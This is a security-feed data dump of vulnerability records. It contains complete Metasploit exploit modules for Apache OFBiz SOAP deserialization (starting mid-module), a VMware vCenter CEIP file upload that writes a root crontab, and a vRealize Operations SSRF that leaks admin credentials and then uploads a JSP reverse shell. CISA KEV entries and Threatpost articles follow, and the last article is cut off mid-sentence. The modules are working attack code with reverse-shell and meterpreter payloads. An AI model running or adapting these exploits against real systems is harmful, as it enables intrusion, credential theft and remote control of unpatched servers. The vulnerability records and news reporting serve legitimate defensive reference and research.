['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :curl, \n'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' \n} \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(8443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \n# Send an empty serialized object \nres = send_request_soap('') \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nmessages = {} \nres.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry| \nkey = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s \nmessages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s \nend \n \nif messages['errorMessage']&.start_with?('Problem deserializing object from byte array') \nreturn CheckCode::Vulnerable('Target can deserialize arbitrary data.') \nend \n \nCheckCode::Safe('Target cannot deserialize arbitrary data.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_soap( \n# framework/webapp/lib/rome-0.9.jar \ngenerate_java_deserialization_for_command('ROME', 'bash', cmd) \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\") \nend \n \nprint_good(\"Successfully executed command: #{cmd}\") \nend \n \ndef send_request_soap(data) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/webtools/control/SOAPService'), \n'ctype' => 'text/xml', \n'data' => <<~XML \n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header/> \n<soapenv:Body> \n<ser> \n<map-HashMap> \n<map-Entry> \n<map-Key> \n<cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj> \n</map-Key> \n<map-Value> \n<std-String value=\"http://#{Faker::Internet.domain_name}\"/> \n</map-Value> \n</map-Entry> \n</map-HashMap> \n</ser> \n</soapenv:Body> \n</soapenv:Envelope> \nXML \n) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162104/apache_ofbiz_deserialization_soap.rb.txt"}, {"lastseen": "2021-10-07T14:18:18", "description": "", "cvss3": {}, "published": "2021-10-07T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-07T00:00:00", "id": "PACKETSTORM:164439", "href": "https://packetstormsecurity.com/files/164439/VMware-vCenter-Server-Analytics-CEIP-Service-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload', \n'Description' => %q{ \nThis module exploits a file upload in VMware vCenter Server's \nanalytics/telemetry (CEIP) service to write a system crontab and \nexecute shell commands as the root user. \n \nNote that CEIP must be enabled for the target to be exploitable by \nthis module. CEIP is enabled by default. \n}, \n'Author' => [ \n'George Noseevich', # Discovery \n'Sergey Gerasimov', # Discovery \n'VMware', # Initial PoC \n'Derek Abdine', # Analysis \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-22005'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'], \n['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'], \n['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'], \n['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee'] \n], \n'DisclosureDate' => '2021-09-21', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'WfsDelay' => 60 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'), \n'vars_get' => { \n'_c' => '' \n} \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.body == '\"FULL\"' \nreturn CheckCode::Safe('CEIP is not fully enabled.') \nend \n \nCheckCode::Appears('CEIP is fully enabled.') \nend \n \ndef exploit \nprint_status('Creating path traversal') \n \nunless write_file(rand_text_alphanumeric(8..16)) \nfail_with(Failure::NotVulnerable, 'Failed to create path traversal') \nend \n \nprint_good('Successfully created path traversal') \n \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \n \nprint_warning(\"Please wait up to #{wfs_delay} seconds for a session\") \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Writing system crontab: #{crontab_path}\") \n \ncrontab_file = crontab(cmd) \nvprint_line(crontab_file) \n \nunless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file) \nfail_with(Failure::PayloadFailed, 'Failed to write system crontab') \nend \n \nprint_good('Successfully wrote system crontab') \nend \n \ndef write_file(path, data = nil) \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'), \n'ctype' => 'application/json', \n'vars_get' => { \n'_c' => '', \n'_i' => \"/#{path}\" \n}, \n'data' => data \n) \n \nreturn false unless res&.code == 201 \n \ntrue \nend \n \ndef crontab(cmd) \n# https://man7.org/linux/man-pages/man5/crontab.5.html \n<<~CRONTAB.strip \n* * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/ \n* * * * * root #{cmd} \nCRONTAB \nend \n \ndef crontab_path \n\"/etc/cron.d/#{crontab_name}.json\" \nend \n \ndef crontab_name \n@crontab_name ||= rand_text_alphanumeric(8..16) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164439/vmware_vcenter_analytics_file_upload.rb.txt"}, {"lastseen": "2021-04-27T15:49:39", "description": "", "cvss3": {}, "published": "2021-04-27T00:00:00", "type": "packetstorm", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "PACKETSTORM:162349", "href": "https://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE', \n'Description' => %q{ \nThis module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth \nfile write (CVE-2021-21983) in VMware vRealize Operations Manager to \nleak admin creds and write/execute a JSP payload. \n \nCVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and \nCVE-2021-21983 affects the /casa/private/config/slice/ha/certificate \nendpoint. Code execution occurs as the \"admin\" Unix user. \n \nThe following vRealize Operations Manager versions are vulnerable: \n \n* 7.0.0 \n* 7.5.0 \n* 8.0.0, 8.0.1 \n* 8.1.0, 8.1.1 \n* 8.2.0 \n* 8.3.0 \n \nVersion 8.3.0 is not exploitable for creds and is therefore not \nsupported by this module. Tested against 8.0.1. \n}, \n'Author' => [ \n'Egor Dimitrenko', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-21975'], # SSRF \n['CVE', '2021-21983'], # File write \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'], \n['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'], \n['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis'] \n], \n'DisclosureDate' => '2021-03-30', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, \n'Targets' => [ \n['vRealize Operations Manager < 8.3.0', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SRVPORT' => 8443, \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs \nARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa \n] \n}, \n'Stance' => Stance::Aggressive \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef setup \nsuper \n \n@creds = nil \n \nprint_status('Starting SSRF server...') \nstart_service \nend \n \ndef check \nleak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe \nend \n \ndef exploit \nreturn unless (@creds ||= leak_admin_creds) \n \nwrite_jsp_payload \nexecute_jsp_payload \nend \n \ndef leak_admin_creds \n# \"Comment out\" trailing path using URI fragment syntax, ostensibly \nssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\" \n \nprint_status('Leaking admin creds via SSRF...') \nvprint_status(ssrf_uri) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'), \n'ctype' => 'application/json', \n'data' => [ssrf_uri].to_json \n) \n \nunless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri \nprint_error('Failed to send SSRF request') \nreturn \nend \n \nunless @creds \nprint_error('Failed to leak admin creds') \nreturn \nend \n \nprint_good('Successfully leaked admin creds') \nvprint_status(\"Authorization: #{@creds}\") \n \n@creds \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"#{cli.peerhost} connected to SSRF server!\") \nvprint_line(request.to_s) \n \n@creds ||= request.headers['Authorization'] \nensure \nsend_not_found(cli) \nclose_client(cli) \nend \n \ndef write_jsp_payload \njsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\" \n \nprint_status('Writing JSP payload') \nvprint_status(jsp_path) \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \n\"../../../../..#{jsp_path}\", \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n'form-data; name=\"name\"' \n) \nmultipart_form.add_part( \npayload.encoded, \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n%(form-data; name=\"file\"; filename=\"#{jsp_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'), \n'authorization' => @creds, \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res&.code == 200 \nfail_with(Failure::NotVulnerable, 'Failed to write JSP payload') \nend \n \nregister_file_for_cleanup(jsp_path) \n \nprint_good('Successfully wrote JSP payload') \nend \n \ndef execute_jsp_payload \njsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename) \n \nprint_status('Executing JSP payload') \nvprint_status(full_uri(jsp_uri)) \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri, \n'authorization' => @creds \n) \n \nunless res&.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute JSP payload') \nend \n \nprint_good('Successfully executed JSP payload') \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\" \nend \n \nend \n`\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/162349/vmware_vrops_mgr_ssrf_rce.rb.txt"}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Server Side Request Forgery (SSRF) in vRealize Operations Manager API prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API to perform a SSRF attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "VMware Server Side Request Forgery in vRealize Operations Manager API", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-21975", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T15:17:54", "description": "VMware vCenter Server contains a file upload vulnerability in the Analytics service that allows a user with network access to port 443 to execute code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-22005", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-09-28T22:42:30", "description": "On its own, the database of 3.8 billion phone numbers [leaked from ](<https://threatpost.com/clubhouse-users-data-hacker-forum/165354/>) social-media platform Clubhouse didn\u2019t have much value on the underground market. In fact, they were eventually dumped in a hacker forum for free.\n\nBut an enterprising threat actor has reportedly combined those phone numbers with 533 million [Facebook profiles leaked last April](<https://threatpost.com/facebook-accounts-leaked-check-exposed/165245/>) and is selling that enFhanced trove of personal identifiable information (PII) to the highest bidder on the underground market.\n\nAccording to CyberNews, the combined [Clubhouse-Facebook database](<https://cybernews.com/security/3-8-billion-allegedly-scraped-and-merged-clubhouse-and-facebook-user-records-put-for-sale-online/>) includes names, phone numbers and other data, and is listed on an underground forum for $100,000 for all 3.8 billion entries, with smaller chunks of data available for less. Reportedly, the seller is still looking for buyers.\n\n## **Data Likely to Fuel ATO Attacks **\n\nThese credentials could quickly be leveraged for basic account takeover (ATO) attacks, according to Brian Uffelman, who is a security analyst for PerimeterX.\n\n\u201cThese stolen credentials are then used for credential-stuffing and ATO attacks, which can steal value, whether that is in the form of gift cards, credit-card numbers, loyalty points or making false purchases,\u201d Uffelman told Threatpost. \u201cATO attacks are a major threat to any business and all of this just creates more fuel to feed the ATO attack fire.\u201d\n\nHe added that it\u2019s much easier for cybercriminals to use stolen credentials than to do the work of trying to find holes in an organization\u2019s cybersecurity defenses. In fact, Uffelman pointed out PerimeterX research showed out of all login attempts measured in the second-half of 2020, up to 85 percent were ATO attempts.\n\n\u201cOrganizations need to be aware of signs that they\u2019ve been attacked,\u201d Uffelman warned. \u201cThese can include surges in help-desk calls, spikes in password resets and inhuman user behaviors, such as thousands of login attempts on an account in a short time period and then take the appropriate action to block these attacks.\u201d\n\nUsers need to be aware of signs of breach, too, he added.\n\n\u201cConsumers need to ensure they are using varied and robust passwords across different websites and applications and lock down their credit reports as well.\u201d\n\n## **Facebook-Clubhouse Data Will Fuel Smishing Attacks **\n\n[Smishing](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>), or socially engineered phishing attempts conducted through SMS text messages, is a likely way cybercriminals will try to turn this database into profit, Jake Williams, from BreachQuest told Threatpost.\n\n\u201cWith this information, threat actors can send SMS phishes while spoofing the sender\u2019s number of a known friend,\u201d Williams said. \u201cA threat actor could go even further by using an SMS phishing pretext tailored to the victim based on their recent Facebook posts. Users are advised to be extremely careful in acting on unexpected SMS messages, even from senders they believe they know.\u201d\n\nWilliams added that Clubhouse users need to be on the lookout for suspicious texts, particularly those asking to transfer funds or confirm requests with a phone call, which are both common smishing tactics.\n\nAnd even if petty thieves don\u2019t see the value in the information, John Bambenek from Netenrich told Threatpost that he suspects intelligence agencies will take notice.\n\n\u201cBreaches like these often get sold at a discount because the ones who stole the data don\u2019t know what to do with it. In some cases, intelligence agencies will buy them if they have targets of interest on those platforms,\u201d Bambenek said. \u201cLikely the biggest use will go into the secondary consumer data market for those who want to build profiles for specific ad targeting.\u201d\n\nBeyond immediate ramifications of the enhanced data falling into the wrong hands, Archie Agarwal from ThreatModeler pointed out that as these leaks continue, it will enable threat actors to create incredibly rich profiles of targets.\n\n\u201cAside from using data like this for more targeted scamming, there is a much larger concern,\u201d Agarwal told Threatpost. \u201cAs we share more and more personal information across an ever-growing list of social-media platforms, combining data gleaned from this type of scraping, together with leaked breach information and leveraging big-data analytics to mine it, could potentially reveal previously hidden information and behaviors on users.\u201d\n\n## **Users Have Accepted Risks **\n\nWhile the infosec community is alarmed by the prospect of all that data floating around, Roger Grimes from KnowBe4 doesn\u2019t expect the seller of the combined Clubhouse-Facebook data to get much finanical gain out of the deal.\n\n\u201cMy bet is the seller doesn\u2019t get anywhere close to their $100,000 asking price. It\u2019s not a scarce resource,\u201d Grimes said in an email to Threatpost.\n\nHe also noted that while he agrees the data could fuel future smishing and other socially engineered attacks, he doesn\u2019t suspect much pushback from users.\n\n\u201cI think most people simply see this as a cost of using free internet services, Clubhouse or any other service,\u201d he said.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[_JOIN_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[_4 Golden Rules of Linux Security_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[_REGISTER NOW_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-27T14:59:58", "type": "threatpost", "title": "3.8 Billion Users\u2019 Combined Clubhouse, Facebook Data Up for Sale", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T14:59:58", "id": "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "href": "https://threatpost.com/clubhouse-facebook-data-sale/175023/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-29T14:13:43", "description": "The threat actors behind the notorious SolarWinds supply-chain attacks have dispatched new malware to steal data and maintain persistence on victims\u2019 networks, researchers have found.\n\nResearchers from the Microsoft Threat Intelligence Center (MSTIC) have observed the APT it calls Nobelium using a post-exploitation backdoor dubbed FoggyWeb, to attack Active Directory Federation Services (AD FS) servers. AD FS enables single sign-on (SSO) across cloud-based apps in a Microsoft environment, by sharing digital identity and entitlements rights.\n\nThe attacks started as far back as April, Ramin Nafisi from MSTIC wrote in a [blog post](<https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/>) published Monday.\n\nNobelium is employing \u201cmultiple tactics to pursue credential theft\u201d to gain admin privileges to AD FS servers, Nafisi wrote. Then, once a server is compromised, the threat group deploys FoggyWeb \u201cto remotely exfiltrate the configuration database of compromised AD FS servers, decrypted [token-signing certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/token-signing-certificates>) and [token-decryption certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/certificate-requirements-for-federation-servers>),\u201d he said, which can be used to penetrate into users\u2019 cloud accounts.\n\nIn addition to remotely exfiltrating sensitive data, FoggyWeb also achieves persistence and communicates with a a command-and-control (C2) server to receive additional malicious components and execute them, Nafisi added.\n\n## **Backdoor Breakdown**\n\nNafisi provides a thorough breakdown of the sophisticated FoggyWeb backdoor, which operates by allowing abuse of the Security Assertion Markup Language (SAML) token in AD FS, he explained in the post.\n\n\u201cThe backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment,\u201d Nafisi wrote. \u201cThe custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.\u201d\n\nAttackers store the malware in an encrypted file called _Windows.Data.TimeZones.zh-PH.pri_, while the malicious file _version.dll_ acts as a loader. The DLL file leverages the CLR hosting interfaces and APIs to load FoggyWeb, a managed DLL, in the same Application Domain within which legitimate AD FS managed code is executed.\n\nIn this way, FoggyWeb gains access to the AD FS codebase and resources, including the AD FS configuration database. The malware also inherits AD FS service account permissions that are required to access the AD FS configuration database, Nafisis wrote.\n\nAdditionally, \u201cbecause FoggyWeb is loaded into the same application domain as the AD FS managed code, it gains programmatical access to the legitimate AD FS classes, methods, properties, fields, objects and components that are subsequently leveraged by FoggyWeb to facilitate its malicious operations,\u201d he added.\n\nMoreover, FoggyWeb is also AD FS version-agnostic, which means it doesn\u2019t need to keep track of legacy versus modern configuration table names and schemas, named pipe names and other version-dependent properties of AD FS, Nafisi wrote.\n\n## **Malware Mitigation**\n\nMicrosoft has notified all customers observed being targeted or compromised by FoggyWeb, as well as included a comprehensive list of compromise indicators in the post.\n\nThe company also has recommended several mitigation actions for organizations, including: Auditing of on-premises and cloud infrastructure to identify any changes the actor might have made to maintain access; removing user and app access, reviewing configurations for each, and re-issuing new, strong credentials; and using a hardware security module to prevent the exfiltration of sensitive data.\n\nMicrosoft also is advising that all customers review their AD FS Server configuration and implement whatever changes are needed to secure the systems from attacks.\n\n## **Tracking a Known Threat Actor**\n\nMicrosoft researchers have been keeping a wary eye on Nobelium since the company [got caught up](<https://threatpost.com/microsoft-solarwinds-spy-attack-federal-agencies/162414/>) in the [SolarWinds attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that was first discovered late last year. They\u2019ve been tracking the threat group\u2019s activity and capabilities, which have expanded as the actors have built and deployed new malware.\n\nSince [the SolarWinds incident](<https://threatpost.com/dhs-sophisticated-cyberattack-foreign-adversaries/162242/>), researchers have observed Nobelium steadily building out its arsenal beyond the Sunburst/Solorigate backdoor and Teardrop malware it initially deployed in that attack, which reached tens of thousands of organizations around the globe (though fewer than 100 were selected by the attackers for actual breach and compromise).\n\nThe group used malware called [Raindrop](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) in those follow-on SolarWinds attacks, then later added [GoldMax, GoldFinder and Sibot](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) malware for layered persistence to its toolset.\n\nMicrosoft researchers also identified EnvyScout, BoomBox, NativeZone and VaporRage as four pieces of malware that were used in a Nobelium [email-based attack chain](<https://threatpost.com/solarwinds-nobelium-phishing-attack-usaid/166531/>) earlier this year.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T14:39:49", "type": "threatpost", "title": "SolarWinds Attackers Hit Active Directory Servers with FoggyWeb Backdoor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T14:39:49", "id": "THREATPOST:CD203B10BCB138850F42815F74C8A5AF", "href": "https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:42:30", "description": "A fully working exploit for the critical CVE-2021-22005 remote code-execution (RCE) vulnerability in VMware vCenter is now public and being exploited in the wild.\n\nReleased on Monday by Rapid7 security engineer William Vu (who goes by the Twitter handle [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>)), this one\u2019s different from the incomplete proof-of-concept (PoC) exploit that began making the rounds on Friday. This variant can be used to open a reverse shell on a vulnerable server, allowing remote attackers to execute arbitrary code.\n\nThe vulnerability can be exploited by unauthenticated, remote users and allows attackers to upload a file to the vCenter Server analytics service.\n\n## UPDATE: Indicators of Exploit\n\nUPDATE: 092821 16:21 The attack team at the attack surface management firm Randori also has a working RCE exploit for CVE-2021-22005. Zero-day finder Aaron Portnoy detailed the exploit in his [attack notes](<https://www.randori.com/blog/technical-analysis-vcenter-vmsa-2021-0020/>), which also include detection methods and indicators of exploit that defenders can use to determine whether or not they\u2019ve been exploited by this bug.\n\nRandori confirmed what VMware, CISA and everybody else is saying: Namely, that these vulnerabilities \u201care very serious issues,\u201d and that affected organizations \u201cshould take immediate action to ensure the security of impacted devices.\u201d As it is, Portnoy said, CISA has predicted a high likelihood that foreign actors will move quickly to exploit the 